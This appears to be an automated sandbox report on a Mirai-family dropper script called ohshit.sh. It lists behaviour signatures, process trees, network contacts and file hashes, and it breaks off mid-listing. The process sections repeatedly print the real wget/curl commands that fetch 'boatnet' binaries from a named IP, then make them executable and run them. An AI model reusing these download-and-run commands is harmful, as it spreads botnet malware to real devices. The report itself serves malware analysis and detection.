Analysis Overview
SHA256
3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
Threat Level: Known bad
The file ohshit.sh was found to be: Known bad.
Malicious Activity Summary
Mirai
Loads a kernel module
Executes dropped EXE
UPX packed file
Modifies Watchdog functionality
Writes file to system bin folder
Enumerates running processes
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
cURL User-Agent
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-31 21:05
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
debian9-armhf-20240611-en
Max time kernel
60s
Max time network
65s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-7Xnobv WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-7Xnobv WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
/tmp/WTF
| MD5 | d209dadd662918c0360d992f693a4c88 |
| SHA1 | ff29a4cb9d0d2a4ad7e15f7523bdc5d5d681f990 |
| SHA256 | f461632cc61eaa9bcf7deb5dba0ca986c5ea65fb366fae6d329cee5458abd07d |
| SHA512 | 809bb6cea3b997755c9464d90f6b3e18b2a007c2b55dcb85ef475e72f632f6c0ea435c9fb7567741ff5233204e958d234ca7ec8e69bfdffff1a8c1dab7c55aba |
/tmp/WTF
| MD5 | b07b623c82c30103949e473cb8f1dc5b |
| SHA1 | 605c491a89e2d0e15f1e856c4f64592d63f7343b |
| SHA256 | dc6da971003c88fdafa96d46017b5c53bc87cb3f081e0be4d1342865c85bf898 |
| SHA512 | 23cd691cfae363b1194586f46403d58e1ea609c4655fba1eb295f344bd41b94ebbe15291b229678dcd3b72a8d2bff2dabfa645eb7e7f4b1d828168ed769d17b4 |
/tmp/WTF
| MD5 | f1c24d9fa40a047ae22d2d3ae7dfeac9 |
| SHA1 | 750274b02d5f5b00026a4f55b020f4285c693533 |
| SHA256 | 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc |
| SHA512 | 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259 |
/tmp/WTF
| MD5 | a8f502a6fb3b7b940e922c951d9e493a |
| SHA1 | fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf |
| SHA256 | 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec |
| SHA512 | e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338 |
/tmp/WTF
| MD5 | 4de74a22ebb3b2008d93fdf898611bdb |
| SHA1 | eb8c46d817f3fca933e91e289897789122b73a54 |
| SHA256 | 728c84285231652ea1b50ed634d83ef0c6e60a78db8ce93a8ae578e21f677f7e |
| SHA512 | 2bc0a4d9610ae4f15475a3eae1b85d812cb8c5229e53f09f2e47aaf26c6963eaffae5d57b27271f2bb35979ddf358e53adcebc1df503030e9854214af1a3c944 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
debian9-mipsel-20240611-en
Max time kernel
60s
Max time network
63s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-ccaa101beeae40f1b359d416f45a956a-systemd-timedated.service-NPoiUQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-ccaa101beeae40f1b359d416f45a956a-systemd-timedated.service-NPoiUQ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
/tmp/WTF
| MD5 | d209dadd662918c0360d992f693a4c88 |
| SHA1 | ff29a4cb9d0d2a4ad7e15f7523bdc5d5d681f990 |
| SHA256 | f461632cc61eaa9bcf7deb5dba0ca986c5ea65fb366fae6d329cee5458abd07d |
| SHA512 | 809bb6cea3b997755c9464d90f6b3e18b2a007c2b55dcb85ef475e72f632f6c0ea435c9fb7567741ff5233204e958d234ca7ec8e69bfdffff1a8c1dab7c55aba |
/tmp/WTF
| MD5 | b07b623c82c30103949e473cb8f1dc5b |
| SHA1 | 605c491a89e2d0e15f1e856c4f64592d63f7343b |
| SHA256 | dc6da971003c88fdafa96d46017b5c53bc87cb3f081e0be4d1342865c85bf898 |
| SHA512 | 23cd691cfae363b1194586f46403d58e1ea609c4655fba1eb295f344bd41b94ebbe15291b229678dcd3b72a8d2bff2dabfa645eb7e7f4b1d828168ed769d17b4 |
/tmp/WTF
| MD5 | f1c24d9fa40a047ae22d2d3ae7dfeac9 |
| SHA1 | 750274b02d5f5b00026a4f55b020f4285c693533 |
| SHA256 | 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc |
| SHA512 | 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259 |
/tmp/WTF
| MD5 | a8f502a6fb3b7b940e922c951d9e493a |
| SHA1 | fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf |
| SHA256 | 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec |
| SHA512 | e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338 |
/tmp/WTF
| MD5 | 664b42890b160712531140f74a6ab47f |
| SHA1 | 69e5e14ab80133b263346c98bbbc57560b9887e1 |
| SHA256 | 1dd24db0f03ba2d6914002eda04248a0561513a47f55852666540bd23c582ef6 |
| SHA512 | d35bfda654489c7615e48ceed90b659730e40da09dc67272bbe6064853b8bbe2ccfb301e95d4488262f62741ceebceac43aa98af90f789036527588b0cc531c3 |
memory/843-1-0x00400000-0x0043bfb4-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
59s
Max time network
61s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/633/status | /tmp/WTF | N/A |
| File opened for reading | /proc/629/status | /tmp/WTF | N/A |
| File opened for reading | /proc/90/status | /tmp/WTF | N/A |
| File opened for reading | /proc/101/status | /tmp/WTF | N/A |
| File opened for reading | /proc/110/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1243/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1601/status | /tmp/WTF | N/A |
| File opened for reading | /proc/646/status | /tmp/WTF | N/A |
| File opened for reading | /proc/697/status | /tmp/WTF | N/A |
| File opened for reading | /proc/94/status | /tmp/WTF | N/A |
| File opened for reading | /proc/411/status | /tmp/WTF | N/A |
| File opened for reading | /proc/697/status | /tmp/WTF | N/A |
| File opened for reading | /proc/209/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1197/status | /tmp/WTF | N/A |
| File opened for reading | /proc/987/status | /tmp/WTF | N/A |
| File opened for reading | /proc/697/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1642/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1657/status | /tmp/WTF | N/A |
| File opened for reading | /proc/405/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1669/status | /tmp/WTF | N/A |
| File opened for reading | /proc/12/status | /tmp/WTF | N/A |
| File opened for reading | /proc/119/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1451/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1586/status | /tmp/WTF | N/A |
| File opened for reading | /proc/86/status | /tmp/WTF | N/A |
| File opened for reading | /proc/82/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1077/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1091/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1199/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1586/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1159/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1638/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1091/status | /tmp/WTF | N/A |
| File opened for reading | /proc/102/status | /tmp/WTF | N/A |
| File opened for reading | /proc/871/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1147/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1077/status | /tmp/WTF | N/A |
| File opened for reading | /proc/96/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1056/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1607/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1655/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1665/status | /tmp/WTF | N/A |
| File opened for reading | /proc/13/status | /tmp/WTF | N/A |
| File opened for reading | /proc/95/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1310/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1666/status | /tmp/WTF | N/A |
| File opened for reading | /proc/4/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1647/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1675/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1652/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1662/status | /tmp/WTF | N/A |
| File opened for reading | /proc/835/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1188/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1249/status | /tmp/WTF | N/A |
| File opened for reading | /proc/98/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1641/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1243/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1635/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1652/status | /tmp/WTF | N/A |
| File opened for reading | /proc/609/status | /tmp/WTF | N/A |
| File opened for reading | /proc/224/status | /tmp/WTF | N/A |
| File opened for reading | /proc/705/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1223/status | /tmp/WTF | N/A |
| File opened for reading | /proc/7/status | /tmp/WTF | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/wget | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/cat
[cat boatnet.x86]
/usr/bin/chmod
[chmod +x WTF boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/chmod
[chmod +x WTF boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/chmod
[chmod +x WTF boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/chmod
